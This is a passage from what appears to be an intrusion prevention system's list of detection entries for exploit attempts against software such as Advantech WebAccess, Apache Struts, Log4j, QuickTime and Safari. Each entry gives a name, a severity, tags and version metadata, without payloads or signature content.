Tags: Any Operating System, Any Hardware, Advantech WebAccess, CVE2014, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-587-5211
Last changed: sgpkg-ips-1411-5242
Vulnerability: Advantech-WebAccess-SCADA-Webvact.ocx-Accesscode-Buffer-Overflow
Description:
Back to top

File-Text_Advantech-WebAccess-SCADA-Webvact.ocx-GotoCmd-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Advantech WebAccess detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Advantech WebAccess, CVE2014, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1098-5242
Last changed: sgpkg-ips-1411-5242
Vulnerability: Advantech-WebAccess-SCADA-Webvact.ocx-GotoCmd-Buffer-Overflow
Description:
Back to top

File-Text_Advantech-WebAccess-SCADA-Webvact.ocx-NodeName-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Advantech WebAccess detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Advantech WebAccess, CVE2014, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-580-5211
Last changed: sgpkg-ips-1411-5242
Vulnerability: Advantech-WebAccess-SCADA-Webvact.ocx-NodeName-Buffer-Overflow
Description:
Back to top

File-Text_Advantech-WebAccess-SCADA-Webvact.ocx-Username-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Advantech WebAccess detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Advantech WebAccess, CVE2014, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-578-5211
Last changed: sgpkg-ips-1411-5242
Vulnerability: Advantech-WebAccess-SCADA-Webvact.ocx-Username-Buffer-Overflow
Description:
Back to top

File-Text_Advantech-WebAccess-Stack-Based-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Advantech WebAccess Stack Based Buffer Overflow detected.
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Advantech WebAccess, CVE2014, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-697-5211
Last changed: sgpkg-ips-1750-5242
Vulnerability: Advantech-WebAccess-Stack-Based-Buffer-Overflow
Description:
Back to top

File-Text_Advantech-WebAccess-Webdobj-ActiveX-Updateproject-Stack-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Advantech WebAccess detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Advantech WebAccess, CVE2014, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-687-5211
Last changed: sgpkg-ips-688-5211
Vulnerability: Advantech-WebAccess-Webdobj-ActiveX-Updateproject-Stack-Buffer-Overflow
Description:
Back to top

File-Text_Advantech-WebAccess-Webeyeaudio.ocx-ActiveX-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Advantech WebAccess detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Advantech WebAccess, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-609-5211
Last changed: sgpkg-ips-609-5211
Vulnerability: Advantech-WebAccess-Multiple-ActiveX-Vulnerabilities
Description:
Back to top

File-Text_Advantech-WISE-PaaS-RMM-SQLMgmt-Qrydata-SQL-Injection

About this situation: An attempt to exploit a vulnerability in Advantech WISE-PaaS/RMM detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Advantech WISE-PaaS RMM, CVE2019, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1242-5242
Last changed: sgpkg-ips-1242-5242
Vulnerability: Advantech-WISE-PaaS-RMM-SQLMgmt-Qrydata-SQL-Injection
Description:
Back to top

File-Text_Agilent-Technologies-Feature-Extraction-ActiveX-Index-Boundary-Error

About this situation: An attempt to exploit a vulnerability in Agilent Technologies Feature Extraction detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Agilent Technologies Feature Extraction, CVE2015, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-639-5211
Last changed: sgpkg-ips-1382-5242
Vulnerability: Agilent-Technologies-Feature-Extraction-ActiveX-Index-Boundary-Error
Description:
Back to top

File-Text_Agobot-Traffic

About this situation: AgoBot Traffic Detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Botnet, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-618-5211
Last changed: sgpkg-ips-618-5211
Vulnerability: Agobot
Description:
Back to top

File-Text_Akamai-Download-Manager-BOF

About this situation: An attempt to exploit a vulnerability in Akamai Download Manager detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Akamai Download Manager, CVE2007, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-571-5211
Vulnerability: HTTP_Akamai-Download-Manager-ActiveX-Buffer-Overflow
Description:
Back to top

File-Text_Altnet-Download-Manager-ADM4-ActiveX-Control-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Altnet Download Manager ADM4 ActiveX control detected
Context: Text File Stream
Severity: 10
Tags: Windows, Any Hardware, Kazaa, Grokster, Altnet Download Manager, CVE2007, Windows not specific, Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-573-5211
Vulnerability: Altnet-Download-Manager-ADM4-ActiveX-Control-Buffer-Overflow
Description:
Back to top

File-Text_America-Online-ICQ-ActiveX-Control-DownloadAgent-Function-Called

About this situation: Detects function calls to the DownloadAgent method of the AOL ICQ ICQPhone.SipxPhoneManager ActiveX control
Context: Text File Stream
Severity: 10
Tags: Windows, x86, AOL Instant Messenger, CVE2006, Windows not specific, Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-551-5211
Vulnerability: HTTP-America-Online-ICQ-ActiveX-Control-DownloadAgent-Function-Code-Execution
Description:
Back to top

File-Text_AMX-NetLinx-VNC-ActiveX-Control-Buffer-Overflow

About this situation: AMX NetLinx VNC ActiveX control detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, AMX NetLinx, CVE2007, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-571-5211
Vulnerability: AMX-NetLinx-VNC-ActiveX-Control-Buffer-Overflow
Description:
Back to top

File-Text_Android-Content-Provider-File-Disclosure

About this situation: An attempt to exploit an Android Content Provider File Disclosure vulnerability detected.
Context: Text File Stream
Severity: 7
Tags: Android, Any Hardware, Google Android Browser, CVE2010, Suspected Disclosure, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-716-5211
Last changed: sgpkg-ips-1225-5242
Vulnerability: Android-Content-Provider-File-Disclosure
Description:
Back to top

File-Text_AOL-Explorer-ActiveX-Vulnerable-Function-Call

About this situation: A vulnerable function call against AOL Explorer was detected
Context: Text File Stream
Severity: 7
Tags: Windows, x86, Internet Explorer, Windows not specific, Internet Explorer not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-579-5211
Last changed: sgpkg-ips-579-5211
Vulnerability: AOL-Explorer-ActiveX-Vulnerable-Function-Call
Description:
Back to top

File-Text_AOL-Phobox-Playlist-ActiveX-Component-Buffer-Overflow

About this situation: Attempt to exploit a vulnerability in AOL Phobox.Playlist ActiveX control
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, AOL, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-574-5211
Vulnerability: AOL-Phobox-Playlist-ActiveX-Component-Buffer-Overflow
Description:
Back to top

File-Text_AOL-SuperBuddy-ActiveX-Control-Function-Deference

About this situation: Attempt to exploit a vulnerability in AOL SuperBuddy ActiveX control
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, AOL, CVE2006, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-551-5211
Vulnerability: AOL-SuperBuddy-ActiveX-Control-Function-Deference
Description:
Back to top

File-Text_Apache-Jspwiki-Userpreferences-Cross-Site-Request-Forgery

About this situation: An attempt to exploit a vulnerability in Apache Software Foundation JSPWiki detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Apache Software Foundation JSPWiki, CVE2022, Any Operating System not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1865-5242
Last changed: sgpkg-ips-1865-5242
Vulnerability: Apache-Jspwiki-Userpreferences-Cross-Site-Request-Forgery
Description:
Back to top

File-Text_Apache-Kylin-Getsparksubmitcmd-Command-Injection

About this situation: An attempt to exploit a vulnerability in Apache Software Foundation Kylin detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Apache Kylin, CVE2022, Any Operating System not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1560-5242
Last changed: sgpkg-ips-1560-5242
Vulnerability: Apache-Kylin-Getsparksubmitcmd-Command-Injection
Description:
Back to top

File-Text_Apache-Kylin-Rest-API-Migratecube-Command-Injection

About this situation: An attempt to exploit a vulnerability in Apache Software Foundation Kylin detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Apache Kylin, CVE2020, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1258-5242
Last changed: sgpkg-ips-1260-5242
Vulnerability: Apache-Kylin-Rest-API-Migratecube-Command-Injection
Description:
Back to top

File-Text_Apache-Log4j-JDBC-Appender-JNDI-Injection

About this situation: An attempt to exploit a vulnerability in Apache Software Foundation Log4j detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Apache Software Foundation Log4j, CVE2021, Any Operating System not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1426-5242
Last changed: sgpkg-ips-1426-5242
Vulnerability: Apache-Log4j-JDBC-Appender-JNDI-Injection
Description:
Back to top

File-Text_Apache-Mod-Include-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Apache detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Apache, CVE2004, Any Operating System not specific, Apache not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-410-4219
Last changed: sgpkg-ips-1430-5242
Vulnerability: Apache-Mod-Include-Buffer-Overflow
Description:
Back to top

File-Text_Apache-Ofbiz-XmlRpc-Insecure-Deserialization

About this situation: An attempt to exploit a vulnerability in Apache Software Foundation OFBiz detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Apache Software Foundation OFBiz, CVE2020, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1292-5242
Last changed: sgpkg-ips-1292-5242
Vulnerability: Apache-Ofbiz-XmlRpc-Insecure-Deserialization
Description:
Back to top

File-Text_Apache-OpenOffice-Text-Document-Malicious-Macro-Execution

About this situation: An Apache OpenOffice Text Document Malicious Macro Execution vulnerability
Context: Text File Stream
Severity: 7
Tags: Windows, Linux, Any Hardware, Apache OpenOffice, Windows not specific, Linux not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1022-5242
Last changed: sgpkg-ips-1275-5242
Vulnerability: Apache-OpenOffice-Text-Document-Malicious-Macro-Execution
Description:
Back to top

File-Text_Apache-Root-Privilege-Escalation

About this situation: An attempt to exploit a vulnerability in Apache detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Apache, CVE2019, Windows not specific, Apache not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1405-5242
Last changed: sgpkg-ips-1405-5242
Vulnerability: Apache-Root-Privilege-Escalation
Description:
Back to top

File-Text_Apache-ShenYu-Admin-JWT-Authentication-Bypass-Vulnerability

About this situation: An attempt to exploit a vulnerability in Apache ShenYu Admin detected.
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Apache ShenYu Admin, CVE2021, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1425-5242
Last changed: sgpkg-ips-1728-5242
Vulnerability: Apache-ShenYu-Admin-JWT-Authentication-Bypass-Vulnerability
Description:
Back to top

File-Text_Apache-SkyWalking-Alarm-Wildcard-Search-Graphql-SQL-Injection

About this situation: An attempt to exploit a vulnerability in Apache Software Foundation SkyWalking detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Apache SkyWalking, CVE2020, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1288-5242
Last changed: sgpkg-ips-1288-5242
Vulnerability: Apache-SkyWalking-Alarm-Wildcard-Search-Graphql-SQL-Injection
Description:
Back to top

File-Text_Apache-Solr-Config-API-Insecure-Deserialization

About this situation: An attempt to exploit a vulnerability in Apache Software Foundation Solr detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Apache Solr, CVE2019, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1146-5242
Last changed: sgpkg-ips-1262-5242
Vulnerability: Apache-Solr-Config-API-Insecure-Deserialization
Description:
Back to top

File-Text_Apache-Struts-2-CVE-2017-9805-Exploit-Attempt

About this situation: An attempt to exploit a vulnerability in Apache Software Foundation Struts detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Apache Struts 2, CVE2017, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-987-5242
Last changed: sgpkg-ips-987-5242
Vulnerability: Apache-Struts-2-Rest-Plugin-Xstreamhandler-Insecure-Deserialization
Description:
Back to top

File-Text_Apache-Struts-2-Rest-Plugin-Xstream-Denial-Of-Service

About this situation: An attempt to exploit a vulnerability in XStream XStream detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Apache Struts, CVE2017, Any Operating System not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-988-5242
Last changed: sgpkg-ips-988-5242
Vulnerability: Apache-Struts-2-Rest-Plugin-Xstream-Denial-Of-Service
Description:
Back to top

File-Text_Apache-Struts-2-Rest-Plugin-Xstreamhandler-Insecure-Deserialization-1

About this situation: An attempt to exploit a vulnerability in Apache Software Foundation Struts detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Apache Struts 2, CVE2017, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-988-5242
Last changed: sgpkg-ips-988-5242
Vulnerability: Apache-Struts-2-Rest-Plugin-Xstreamhandler-Insecure-Deserialization
Description:
Back to top

File-Text_Apache-Struts-2-Rest-Plugin-Xstreamhandler-Insecure-Deserialization-2

About this situation: An attempt to exploit a vulnerability in Apache Software Foundation Struts detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Apache Struts 2, CVE2017, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-988-5242
Last changed: sgpkg-ips-988-5242
Vulnerability: Apache-Struts-2-Rest-Plugin-Xstreamhandler-Insecure-Deserialization
Description:
Back to top

File-Text_Apache-Struts-2-Rest-Plugin-Xstreamhandler-Insecure-Deserialization-3

About this situation: An attempt to exploit a vulnerability in Apache Software Foundation Struts detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Apache Struts 2, CVE2017, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-988-5242
Last changed: sgpkg-ips-988-5242
Vulnerability: Apache-Struts-2-Rest-Plugin-Xstreamhandler-Insecure-Deserialization
Description:
Back to top

File-Text_Apache-Struts-2-Rest-Plugin-Xstreamhandler-Insecure-Deserialization-4

About this situation: An attempt to exploit a vulnerability in Apache Software Foundation Struts detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Apache Struts 2, CVE2017, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-988-5242
Last changed: sgpkg-ips-988-5242
Vulnerability: Apache-Struts-2-Rest-Plugin-Xstreamhandler-Insecure-Deserialization
Description:
Back to top

File-Text_Apache-Struts-2-Rest-Plugin-Xstreamhandler-Insecure-Deserialization-5

About this situation: An attempt to exploit a vulnerability in Apache Software Foundation Struts detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Apache Struts 2, CVE2017, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-988-5242
Last changed: sgpkg-ips-988-5242
Vulnerability: Apache-Struts-2-Rest-Plugin-Xstreamhandler-Insecure-Deserialization
Description:
Back to top

File-Text_Apache-Struts-2-Rest-Plugin-Xstreamhandler-Insecure-Deserialization-6

About this situation: An attempt to exploit a vulnerability in Apache Software Foundation Struts detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Apache Struts 2, CVE2017, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-988-5242
Last changed: sgpkg-ips-988-5242
Vulnerability: Apache-Struts-2-Rest-Plugin-Xstreamhandler-Insecure-Deserialization
Description:
Back to top

File-Text_Apache-Struts-2-Rest-Plugin-Xstreamhandler-Insecure-Deserialization-7

About this situation: An attempt to exploit a vulnerability in Apache Software Foundation Struts detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Apache Struts 2, CVE2017, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-988-5242
Last changed: sgpkg-ips-988-5242
Vulnerability: Apache-Struts-2-Rest-Plugin-Xstreamhandler-Insecure-Deserialization
Description:
Back to top

File-Text_Apache-Struts-2-Rest-Plugin-Xstreamhandler-Insecure-Deserialization-8

About this situation: An attempt to exploit a vulnerability in Apache Software Foundation Struts detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Apache Struts 2, CVE2017, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-988-5242
Last changed: sgpkg-ips-988-5242
Vulnerability: Apache-Struts-2-Rest-Plugin-Xstreamhandler-Insecure-Deserialization
Description:
Back to top

File-Text_Apache-Superset-Insecure-Deserialization-CVE-2023-37941

About this situation: An attempt to exploit a vulnerability in Apache Superset detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Apache Superset, CVE2023, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1634-5242
Last changed: sgpkg-ips-1634-5242
Vulnerability: Apache-Superset-Insecure-Deserialization-CVE-2023-37941
Description:
Back to top

File-Text_Apache-Superset-Sqlite-URI-Bypass-CVE-2023-39265

About this situation: An attempt to exploit a vulnerability in Apache Superset detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Apache Superset, CVE2023, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1633-5242
Last changed: sgpkg-ips-1634-5242
Vulnerability: Apache-Superset-Sqlite-URI-Bypass-CVE-2023-39265
Description:
Back to top

File-Text_Apache-Traffic-Server-Esi-Plugin-Cookie-Header-Information-Disclosure

About this situation: An attempt to exploit a vulnerability in Apache Software Foundation Traffic Server detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Apache, CVE2018, Any Operating System not specific, Apache not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1103-5242
Last changed: sgpkg-ips-1623-5242
Vulnerability: Apache-Traffic-Server-Esi-Plugin-Cookie-Header-Information-Disclosure
Description:
Back to top

File-Text_Apple-iPhoto-Xml-Title-Format-String-Vulnerability

About this situation: An attempt to exploit a vulnerability in Apple iPhoto detected
Context: Text File Stream
Severity: 7
Tags: Mac OS X, Any Hardware, Apple iPhoto, CVE2007, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-1531-5242
Vulnerability: HTTP-Apple-iPhoto-Xml-Title-Format-String-Vulnerability
Description:
Back to top

File-Text_Apple-iTunes-Protocol-Handler-Stack-Buffer-Overflow

About this situation: Attempt to exploit a buffer overflow vulnerability in Apple iTunes detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Apple iTunes, CVE2009, Any Operating System not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-1531-5242
Vulnerability: Apple-iTunes-Protocol-Handler-Stack-Buffer-Overflow
Description:
Back to top

File-Text_Apple-QuickTime-ActiveX-Control-Clear-Method-Use-After-Free

About this situation: An attempt to exploit a vulnerability in Apple Quicktime detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Apple QuickTime, CVE2012, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-498-5211
Last changed: sgpkg-ips-625-5211
Vulnerability: Apple-QuickTime-ActiveX-Control-Clear-Method-Use-After-Free
Description:
Back to top

File-Text_Apple-QuickTime-Player-Arbitrary-Code-Execution

About this situation: An attempt to exploit an Apple QuickTime Player Arbitrary Code Execution vulnerability detected
Context: Text File Stream
Severity: 7
Tags: Windows XP SP3, Any Hardware, Apple QuickTime, CVE2010, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-800-5242
Last changed: sgpkg-ips-808-5242
Vulnerability: Apple-QuickTime-Player-Arbitrary-Code-Execution
Description:
Back to top

File-Text_Apple-QuickTime-Plugin-Setlanguage-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Apple Computer QuickTime detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Apple QuickTime, CVE2012, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-465-5211
Last changed: sgpkg-ips-579-5211
Vulnerability: Apple-QuickTime-Plugin-Setlanguage-Buffer-Overflow
Description:
Back to top

File-Text_Apple-QuickTime-Qtplugin-ActiveX-Control-Marshaled-Pointer

About this situation: An attempt to exploit a vulnerability in Apple QuickTime ActiveX control detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Apple QuickTime, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-870-5242
Vulnerability: Apple-QuickTime-Qtplugin-ActiveX-Control-Marshaled-Pointer
Description:
Back to top

File-Text_Apple-QuickTime-QTPlugin.ocx-ActiveX-Vulnerable-Function-Call

About this situation: A vulnerable ActiveX function call against Apple QuickTime was detected
Context: Text File Stream
Severity: 7
Tags: Windows, Mac OS X, Any Hardware, Apple QuickTime, CVE2008, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-580-5211
Last changed: sgpkg-ips-580-5211
Vulnerability: Apple-QuickTime-QTPlugin.ocx-ActiveX-Vulnerable-Function-Call
Description:
Back to top

File-Text_Apple-Safari-Arbitrary-Code-Execution

About this situation: An attempt to exploit an Apple Safari Arbitrary Code Execution vulnerability detected.
Context: Text File Stream
Severity: 7
Tags: OS X, Any Hardware, Safari, CVE2011, OS X not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-745-5211
Last changed: sgpkg-ips-1336-5242
Vulnerability: Apple-Safari-Arbitrary-Code-Execution
Description:
Back to top

File-Text_Apple-Safari-CSS-Format-Argument-Handling-Memory-Corruption

About this situation: An attempt to exploit a vulnerability in Apple Safari detected
Context: Text File Stream
Severity: 7
Tags: Windows, Mac OS X, Any Hardware, Safari, CVE2010, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-1283-5242
Vulnerability: Apple-Safari-CSS-Format-Argument-Handling-Memory-Corruption
Description:
Back to top

File-Text_Apple-Safari-CSS-Style-Overflow-DOS

About this situation: Overtly long CSS style string has been detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Safari, Chrome, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-580-5211
Last changed: sgpkg-ips-1336-5242
Vulnerability: Apple-Safari-CSS-Style-Overflow-DOS
Description:
Back to top

File-Text_Apple-Safari-Feed-URI-Denial-of-Service

About this situation: Detected an attempt to exploit a vulnerability in Apple Safari
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Safari, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-579-5211
Last changed: sgpkg-ips-1283-5242
Vulnerability: Apple-Safari-Feed-URI-Denial-of-Service
Description:
Back to top

File-Text_Apple-Safari-For-Windows-Protocol-Handler-Command-Injection

About this situation: An attempt to exploit an Apple Safari for Windows Protocol Handler Command Injection Vulnerability detected.
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Safari, CVE2007, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-677-5211
Last changed: sgpkg-ips-1336-5242
Vulnerability: Apple-Safari-For-Windows-Protocol-Handler-Command-Injection
Description:
Back to top

File-Text_Apple-Safari-For-Windows-URL-Spoofing

About this situation: An attempt to exploit an Apple Safari for Windows URL Spoofing Vulnerability detected.
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Safari, CVE2008, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-677-5211
Last changed: sgpkg-ips-1336-5242
Vulnerability: Apple-Safari-For-Windows-URL-Spoofing
Description:
Back to top

File-Text_Apple-Safari-HTML-Image-Element-Handling-Use-After-Free

About this situation: An attempt to exploit a vulnerability in Apple Safari detected
Context: Text File Stream
Severity: 7
Tags: Windows, Mac OS X, Any Hardware, Safari, CVE2010, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-1283-5242
Vulnerability: Apple-Safari-HTML-Image-Element-Handling-Use-After-Free
Description:
Back to top

File-Text_Apple-Safari-HTML-Image-Element-Handling-Use-After-Free-2

About this situation: An attempt to exploit a vulnerability in Apple Safari detected
Context: Text File Stream
Severity: 7
Tags: Windows, Mac OS X, Any Hardware, Safari, CVE2010, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-414-4219
Last changed: sgpkg-ips-1283-5242
Vulnerability: Apple-Safari-HTML-Image-Element-Handling-Use-After-Free
Description:
Back to top

File-Text_Apple-Safari-HTML-Image-Element-Handling-Use-After-Free-3

About this situation: An attempt to exploit a vulnerability in Apple Safari detected
Context: Text File Stream
Severity: 7
Tags: Windows, Mac OS X, Any Hardware, Safari, CVE2010, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-414-4219
Last changed: sgpkg-ips-455-5211
Vulnerability: Apple-Safari-HTML-Image-Element-Handling-Use-After-Free
Description:
Back to top

File-Text_Apple-Safari-IDN-Punycode-Canadian-Syllabics-URL-Spoofing

About this situation: An attempt to exploit a vulnerability in Apple Safari detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Safari, CVE2022, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1494-5242
Last changed: sgpkg-ips-1494-5242
Vulnerability: Apple-Safari-IDN-Punycode-Canadian-Syllabics-URL-Spoofing
Description:
Back to top

File-Text_Apple-Safari-JS-Multibyte-Char-Escape

About this situation: Apple Webkit JS multibyte character escape sequence detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Safari, Any Operating System not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-580-5211
Last changed: sgpkg-ips-1283-5242
Vulnerability: Apple-Safari-JS-Multibyte-Char-Escape
Description:
Back to top

File-Text_Apple-Safari-KwqListIteratorImpl-DoS

About this situation: Apple Safari KWQListIteratorImpl() HTML Tag Handling Denial of Service detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Safari, CVE2006, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-580-5211
Last changed: sgpkg-ips-1336-5242
Vulnerability: Apple-Safari-KwqListIteratorImpl-DoS
Description:
Back to top

File-Text_Apple-Safari-Null-Windows-File-Reference-DoS

About this situation: Safari Null Windows file reference Denial of Service detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Safari, CVE2008, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-581-5211
Last changed: sgpkg-ips-1336-5242
Vulnerability: Apple-Safari-Insecure-JavaScript-Usage
Description:
Back to top

File-Text_Apple-Safari-Objc-MsgSend-RTP-DoS

About this situation: Safari objc_msgSend_rtp() Tag handling DoS detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Safari, CVE2006, Any Operating System not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
